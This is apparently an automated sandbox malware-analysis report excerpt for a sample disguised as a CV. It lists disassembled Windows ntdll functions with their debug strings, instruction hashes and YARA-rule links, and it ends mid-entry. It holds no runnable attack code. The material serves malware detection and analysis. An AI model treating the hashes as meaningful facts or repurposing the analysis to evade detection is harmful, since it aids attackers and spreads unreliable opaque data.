                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                    • API String ID: 0-1239276146
                                    • Opcode ID: 0bfee9ac4efef2b55036ed9f77877cc6181bf13adbf035a7689f6a54f8f90d79
                                    • Instruction ID: ba9914489aa4e7db1bd2f46daff6e65c7efb1d2c5f48efc6261f41f06b184dae
                                    • Opcode Fuzzy Hash: 0bfee9ac4efef2b55036ed9f77877cc6181bf13adbf035a7689f6a54f8f90d79
                                    • Instruction Fuzzy Hash: 69A1B136A0022ADBDB25CF59C884BA9B7B5BF59354F1445EAD908AF291D7309EC0CF90
                                    Function 01524AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                    Download Yara Rule
                                    Strings
                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0156342A
                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01563437
                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01563456
                                    • RtlDeactivateActivationContext, xrefs: 01563425, 01563432, 01563451
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                    • API String ID: 0-1245972979
                                    • Opcode ID: 1856275a4019be76f5c95e84b0acc8ead5402b4d450f72aa846abaced24a8eb3
                                    • Instruction ID: d55f2521b3351f792b697d63d2ca59689f2cf6519427d334eecde51707717b12
                                    • Opcode Fuzzy Hash: 1856275a4019be76f5c95e84b0acc8ead5402b4d450f72aa846abaced24a8eb3
                                    • Instruction Fuzzy Hash: 636113326007229BDB22CF1DC845B2AF7E5BF81B11F14852DE999AF290DB70E801CBD1
                                    Function 014F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                    Download Yara Rule
                                    Strings
                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01550FE5
                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0155106B
                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01551028
                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015510AE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                    • API String ID: 0-1468400865
                                    • Opcode ID: 4000b081992b0d1044ad41c278f7c82056a0f715dec0deda896944f9c3f19416
                                    • Instruction ID: a0fc867e7511caf06fa0dbb83c2606ce2909774a1b568decf587fcc21df6f650
                                    • Opcode Fuzzy Hash: 4000b081992b0d1044ad41c278f7c82056a0f715dec0deda896944f9c3f19416
                                    • Instruction Fuzzy Hash: DC71CFB19043069FCB21DF14D889B9B7FA8BF94764F40046AFA489F296D334D589CBD1
                                    Function 0151245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                    Download Yara Rule
                                    Strings
                                    • minkernel\ntdll\ldrinit.c, xrefs: 0155A9A2
                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0155A992
                                    • apphelp.dll, xrefs: 01512462
                                    • LdrpDynamicShimModule, xrefs: 0155A998
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-176724104
                                    • Opcode ID: d6596a9578ee6781e91f5238a4bf228bf067e00c343ea3371dbae714354e816c
                                    • Instruction ID: c261409988f29a6da2112d34f1bc3bea373c1b3a72441734a4529abc2a841af1
                                    • Opcode Fuzzy Hash: d6596a9578ee6781e91f5238a4bf228bf067e00c343ea3371dbae714354e816c
                                    • Instruction Fuzzy Hash: 6A318875E40202ABEB7A9F59D895EAE7BF5FB84B00F23011FE9106F259C7B05845DB80
                                    Function 015029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                    Download Yara Rule
                                    Strings
                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0150327D
                                    • HEAP[%wZ]: , xrefs: 01503255
                                    • HEAP: , xrefs: 01503264
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                    • API String ID: 0-617086771
                                    • Opcode ID: f74188b227dc740bb1e5c32fa22847c19c0ab0d1ffcb90e82ff2ca0ea1dcbbec
                                    • Instruction ID: 84f54939a3d76eeb3a6ccf8b19ce31e4204b704291dc4556b5409434523bf847
                                    • Opcode Fuzzy Hash: f74188b227dc740bb1e5c32fa22847c19c0ab0d1ffcb90e82ff2ca0ea1dcbbec
                                    • Instruction Fuzzy Hash: AA92CB71A046499FDB26CFA8C4447AEBBF1FF48300F188499E85AAF391D735A945CF50
                                    Function 01500770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                    • API String ID: 0-4253913091
                                    • Opcode ID: 4218648ec93079bf50c120ddab04b90264d75082748c88c8d4e5a56539fdeecf
                                    • Instruction ID: 080465ecc2660e0d1eadd646be2a3dd2b79ec7b391c08e9c6ad042fb5b61524e
                                    • Opcode Fuzzy Hash: 4218648ec93079bf50c120ddab04b90264d75082748c88c8d4e5a56539fdeecf
                                    • Instruction Fuzzy Hash: 85F18A30A00606DFEB16CFA8C894B6EBBF5FF84340F148569E9569F291D734E981CB90
                                    Function 01516962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $@
                                    • API String ID: 0-1077428164
                                    • Opcode ID: b546b171749363d0aa35ffb9b5ca63552014e252f44bfa227b4d9a1c2f2cf599
                                    • Instruction ID: 78c2facc72d5a4e30a03e5e84bcb3b0fcbc7928f55952a1cb5d86385476e67bb
                                    • Opcode Fuzzy Hash: b546b171749363d0aa35ffb9b5ca63552014e252f44bfa227b4d9a1c2f2cf599
                                    • Instruction Fuzzy Hash: A5C28D716083419FE766CF28C890BAFBBE5BF88714F04892EE9898B245D774D845CB52
                                    Function 014EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: FilterFullPath$UseFilter$\??\
                                    • API String ID: 0-2779062949
                                    • Opcode ID: 816869b1ae1c224a42de36b1d5a392e265428c8ec1188c5e30cd24db43303136
                                    • Instruction ID: c36db4f43d0a879cf110fa697a57822c85de368283dffb40fdbb0ef45d46a789
                                    • Opcode Fuzzy Hash: 816869b1ae1c224a42de36b1d5a392e265428c8ec1188c5e30cd24db43303136
                                    • Instruction Fuzzy Hash: CDA17F7191162A9BDB31DF64CC88BAEB7B8FF84705F1001EAE909AB250D7359E85CF50
                                    Function 01510BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                    Download Yara Rule
                                    Strings
                                    • LdrpCheckModule, xrefs: 0155A117
                                    • Failed to allocated memory for shimmed module list, xrefs: 0155A10F
                                    • minkernel\ntdll\ldrinit.c, xrefs: 0155A121
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-161242083
                                    • Opcode ID: ba6319a4d7e054c51295800fa7bfd5660f2cfc636fcc28746a4593908eb4fdb6
                                    • Instruction ID: 3983f7fdf5614b7a9df0bf75e471f442ab3acef5ba877026cf1fab3acb8754e6
                                    • Opcode Fuzzy Hash: ba6319a4d7e054c51295800fa7bfd5660f2cfc636fcc28746a4593908eb4fdb6
                                    • Instruction Fuzzy Hash: 9E71D271E00206DFDB2ADF68C990ABEB7F4FB84208F15446EE9119F255E734A985CB50
                                    Function 01500A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                    • API String ID: 0-1334570610
                                    • Opcode ID: 9fe636a4c1a3c290df5788d39fc805d30d0fc62ac0129c10e07aafe0578e6f49
                                    • Instruction ID: fc4509d6b0502315c05dd30af9ff5a1f078c47fbd58a4356bb1d327952a4f7f7
                                    • Opcode Fuzzy Hash: 9fe636a4c1a3c290df5788d39fc805d30d0fc62ac0129c10e07aafe0578e6f49
                                    • Instruction Fuzzy Hash: 1661BD306107029FDB2ACF68C484B6ABBE1FF45744F15856EE8598F2D2D7B0E881CB91
                                    Function 0152C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                    Download Yara Rule
                                    Strings
                                    • minkernel\ntdll\ldrinit.c, xrefs: 015682E8
                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 015682DE
                                    • Failed to reallocate the system dirs string !, xrefs: 015682D7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-1783798831
                                    • Opcode ID: bf690200ed9f4188f0a51f9300646ff6fd8e9bed806411e860ae95e78bbf6cdd
                                    • Instruction ID: 991ce2949f06e99a4104b387a28ecdeade505693682ae07128b1244f3d2d9856
                                    • Opcode Fuzzy Hash: bf690200ed9f4188f0a51f9300646ff6fd8e9bed806411e860ae95e78bbf6cdd
                                    • Instruction Fuzzy Hash: D6412FB2950312ABCB35EF68D844B5F77E8BF99650F05082EF954CF2A1E770D8048B91
                                    Function 015AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015AC1C5
                                    • PreferredUILanguages, xrefs: 015AC212
                                    • @, xrefs: 015AC1F1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                    • API String ID: 0-2968386058
                                    • Opcode ID: 713761c8995b23ac772ab1f6625ea55abeda3e349cf1af1b89958d27da1197a6
                                    • Instruction ID: fdefcd8a75886b2191602529dce59e29bd85bcfb00b54217fad27a311ccb46c9
                                    • Opcode Fuzzy Hash: 713761c8995b23ac772ab1f6625ea55abeda3e349cf1af1b89958d27da1197a6
                                    • Instruction Fuzzy Hash: 36416072E5020AEBDF11DAD8C891FEEBBF8BF54700F54406AE649FB290D7749A448B50
                                    Function 01584144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                    • API String ID: 0-1373925480
                                    • Opcode ID: 4a5eb9d387d8fe862e755fd7c2c335600b1ef0c52ed5f03122c629b7a6186818
                                    • Instruction ID: db4b0308c865bc408467ab8df5e25760b8ec3e9cc7b4a57291f58732c6d19492
                                    • Opcode Fuzzy Hash: 4a5eb9d387d8fe862e755fd7c2c335600b1ef0c52ed5f03122c629b7a6186818
                                    • Instruction Fuzzy Hash: 6041B232A0465A8FEB26EBE9C844BADBBB4BFA5344F14045ADD02BF791D7348901CB51
                                    Function 01574755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                    Download Yara Rule
                                    Strings
                                    • LdrpCheckRedirection, xrefs: 0157488F
                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01574888
                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01574899
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                    • API String ID: 0-3154609507
                                    • Opcode ID: b855c14e63c875b8d365a53458b51b3548e271bb0e3b9bc9a90d54a8962835df
                                    • Instruction ID: cbc47e5d308ddcfaf946e2ede220bc046fc72f040d9764bc8571f993608451b8
                                    • Opcode Fuzzy Hash: b855c14e63c875b8d365a53458b51b3548e271bb0e3b9bc9a90d54a8962835df
                                    • Instruction Fuzzy Hash: 9541B272A04665DFCB21CE6DE842A2ABBE4FF89A50F06056DED59DF312D730D801CB91
                                    Function 01500BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                    • API String ID: 0-2558761708
                                    • Opcode ID: 7dddc056a0a0e07689555ecb997e64fd97493cbbb2f7bf246376c07e9918a166
                                    • Instruction ID: edc27a27b4648677b5d94fdfb489dd5e069db566c04aba88354fcda4d3786927
                                    • Opcode Fuzzy Hash: 7dddc056a0a0e07689555ecb997e64fd97493cbbb2f7bf246376c07e9918a166
                                    • Instruction Fuzzy Hash: E211CD30324542CFDB5ACA188465B2AB7E5FF40A16F18841AE8068F2A1E730E841C740
                                    Function 015720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                    Download Yara Rule
                                    Strings
                                    • Process initialization failed with status 0x%08lx, xrefs: 015720F3
                                    • minkernel\ntdll\ldrinit.c, xrefs: 01572104
                                    • LdrpInitializationFailure, xrefs: 015720FA
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-2986994758
                                    • Opcode ID: cd93c2e40ffafe02a449ff3d5f304ffe1f071caa231033b589b2f51f99c5364f
                                    • Instruction ID: 338ee929f015f08ea70f3ee78ca61fd39b10e4268d1a6bdbea6cd43f7bfbadce
                                    • Opcode Fuzzy Hash: cd93c2e40ffafe02a449ff3d5f304ffe1f071caa231033b589b2f51f99c5364f
                                    • Instruction Fuzzy Hash: 89F0C875A403096BEB24D64DEC57F9937A8FB81B54F11005DF6006F291D2F0A504C691
                                    Function 015003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: #%u
                                    • API String ID: 48624451-232158463
                                    • Opcode ID: d17e8b0fdcc6b41c7add7b22904c5e5640f1d97e67cdc05cd42c6278a0804fb8
                                    • Instruction ID: 5c59b4f5fe1e2652a9edc48da1d36d6d4d04503d5024ada3a1b17f5990af8032
                                    • Opcode Fuzzy Hash: d17e8b0fdcc6b41c7add7b22904c5e5640f1d97e67cdc05cd42c6278a0804fb8
                                    • Instruction Fuzzy Hash: 39715C72A0014A9FDB06DFA8C991BAEB7F8FF58344F154065E905EB291EB34ED41CB60
                                    Function 014FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                    Download Yara Rule
                                    Strings
                                    • LdrResSearchResource Exit, xrefs: 014FAA25
                                    • LdrResSearchResource Enter, xrefs: 014FAA13
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                    • API String ID: 0-4066393604
                                    • Opcode ID: 0d902409d766f5abc8ac245cc24e9d1906d492c0666c8a0113398fad7f342ead
                                    • Instruction ID: 9b8c1a3f7c0ce7771ec3727cd348897e0c232414093f3423b7fed1681b8c26fb
                                    • Opcode Fuzzy Hash: 0d902409d766f5abc8ac245cc24e9d1906d492c0666c8a0113398fad7f342ead
                                    • Instruction Fuzzy Hash: 92E19071E002099FEF62CE99C990BAEBBB9BF44350F20442BEE15EB361D7749845CB50
                                    Function 015BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `$`
                                    • API String ID: 0-197956300
                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                    • Instruction ID: 1ff60d68399cdbb7d039c1cbf56a86db84c35925e9d61024b4538950b7255819
                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                    • Instruction Fuzzy Hash: D1C1C1712043469BEB25CF28C881BABBBE5BFC4318F184A2DF6968F290D775D505CB91
                                    Function 0156E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: Legacy$UEFI
                                    • API String ID: 2994545307-634100481
                                    • Opcode ID: 953090da6152f6756a0ce7f32e75e4547a6b3d8e032b8df0444649b8ee5f055e
                                    • Instruction ID: 8bf36eb769a35faf354d4f57c004f6ea813cd5c5c92065551adb87ef62659e2c
                                    • Opcode Fuzzy Hash: 953090da6152f6756a0ce7f32e75e4547a6b3d8e032b8df0444649b8ee5f055e
                                    • Instruction Fuzzy Hash: CE616C75E012099FDB25DFA8C841BAEBBF9FB44700F24446EE649EF291D731A940CB90
                                    Function 015943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$MUI
                                    • API String ID: 0-17815947
                                    • Opcode ID: 68aa83c4959b96fc0a8f970e875d920e2cfa6426488b7bc62afcf521a91a8f26
                                    • Instruction ID: e8ef281678ef9217eba59f33cfec8eee21e9d981230836ada6a7ee94ae4df746
                                    • Opcode Fuzzy Hash: 68aa83c4959b96fc0a8f970e875d920e2cfa6426488b7bc62afcf521a91a8f26
                                    • Instruction Fuzzy Hash: 9B511871E0061EAFDF11DFE9CD90AEEBBB8FB44654F10052AE615AB290D7309D06CB60
                                    Function 014F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                    Download Yara Rule
                                    Strings
                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014F063D
                                    • kLsE, xrefs: 014F0540
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                    • API String ID: 0-2547482624
                                    • Opcode ID: 2cd14f70ba6f830e5489e027abeb91dae57495b4467a68b3c4220b7db04b2a8e
                                    • Instruction ID: 374ac9d79da00afacd6e6ce04d7cf99becd98574f1c8ef2c992c0a776ce50e79
                                    • Opcode Fuzzy Hash: 2cd14f70ba6f830e5489e027abeb91dae57495b4467a68b3c4220b7db04b2a8e
                                    • Instruction Fuzzy Hash: 7151AF71504742CBD724DF69C4446A7BBE6AFC8304F10483FE6A987362E770E545CB91
                                    Function 014FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                    Download Yara Rule
                                    Strings
                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 014FA2FB
                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 014FA309
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                    • API String ID: 0-2876891731
                                    • Opcode ID: 6b469a0a3c114e660fabd5e9af3760b143dc22dfcab8d038ad917565ea89c2e8
                                    • Instruction ID: 19205503eb5d6513ed2c9aef7745294a7a778541c6c2db417dd4af9e7d99c227
                                    • Opcode Fuzzy Hash: 6b469a0a3c114e660fabd5e9af3760b143dc22dfcab8d038ad917565ea89c2e8
                                    • Instruction Fuzzy Hash: 3941BC35A00646CBDB26DF59C850B6E7BB4FF84710F2440AAEA18DF3A1E7B5D941CB41
                                    Function 0152A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: Cleanup Group$Threadpool!
                                    • API String ID: 2994545307-4008356553
                                    • Opcode ID: ded531b8254b3559a2e1bf63d531b18d7b5d3a5e5e09a4e61a974eff3cd7cd23
                                    • Instruction ID: 92da81c2965bc62928da9cb3a7cf0561a93c52f7aa55fce700a973dc64d7adfe
                                    • Opcode Fuzzy Hash: ded531b8254b3559a2e1bf63d531b18d7b5d3a5e5e09a4e61a974eff3cd7cd23
                                    • Instruction Fuzzy Hash: A7012CB2A10700AFD321CF24CD09B2677E8F795B25F01883AE219CF590E334E804CB46
                                    Function 014FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: MUI
                                    • API String ID: 0-1339004836
                                    • Opcode ID: f174d5dd04d4fc09a0c81f84a10e19a2475d2b09a0a4e521a78aa8c08186bc4c
                                    • Instruction ID: beb1a4b1fa1cb9aebf38f75b5e7abbff19b65357846dc7fdb1c8b51d1fe76d87
                                    • Opcode Fuzzy Hash: f174d5dd04d4fc09a0c81f84a10e19a2475d2b09a0a4e521a78aa8c08186bc4c
                                    • Instruction Fuzzy Hash: A7824E75E002199FEB25CFA9C880BEEBBB5FF44310F14816EDA59AB3A1D7309941CB50
                                    Function 01576420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 9eb572afc08fbe778742546daccea0215cd2751d443602c83130e916660b8d49
                                    • Instruction ID: e7b3626928054443dd40d6e4bc83ebea49755908b8213edeb95b213f95b86bc9
                                    • Opcode Fuzzy Hash: 9eb572afc08fbe778742546daccea0215cd2751d443602c83130e916660b8d49
                                    • Instruction Fuzzy Hash: 70914F7190061AAFEB22DB95DD85FAEBBB8FF58B50F500065F600AF194D774AD04CBA0
                                    Function 0159E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 0ff6010588edbd1b94b9f67ecf5cda886d5aa6b3f20e94b8b119ed92c180cd1b
